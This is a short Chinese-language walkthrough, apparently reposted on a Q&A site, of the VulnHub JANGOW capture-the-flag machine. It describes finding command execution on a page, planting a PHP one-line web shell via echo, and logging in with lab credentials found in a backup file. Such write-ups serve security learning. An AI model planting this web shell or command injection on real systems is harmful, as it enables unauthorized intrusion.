已解决
VulnHub JANGOW
来自网友在路上 146846提问 提问时间:2023-10-07 21:52:44阅读次数: 46
最佳答案 问答题库468位专家为你答疑解惑
提示(主机ip分配问题)
因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的
所以我们可以在VirtualBox上打开
一、信息收集
发现开放了21和80端口,查看一下80端口
80端口:
检查页面后发现Buscar页面有个可疑的地方:
试下,有命令执行
直接写入一句话木马试一下:
echo '<?php eval($_POST["sain"]);' > shell.php
利用命令执行,看到有shell.php,说明上传成功
连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:
除此之外发现在/var/www/html下有一个./backup文件:
发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:
username = "jangow01"password = "abygurl69"
拿到了user_flag
查看全文
99%的人还看了
相似问题
- 关于DBMS_STATS.GATHER_DATABASE_STATS_JOB_PROC的一些发现
- SpringCloudAlibaba系列之Nacos服务注册与发现
- 服务注册发现 springcloud netflix eureka
- 【服务发现与配置】Consul特性及搭建
- Linux开发板移植FTP服务器和OpenSSH时发现的问题
- [云原生1. ] Docker consul的详细介绍(容器服务的更新与发现)
- ubuntu22.04桌面完整版配置WiFi方法(后来发现这个方法是错误的)(修改磁盘文件方式--不需要显示器)
- 发现一款PDF转换成翻页电子书的网站
- 研究人员发现34个Windows驱动程序易受完全设备接管攻击
- 基于Docker-consul容器服务更新与发现
猜你感兴趣
版权申明
本文"VulnHub JANGOW":http://eshow365.cn/6-16962-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!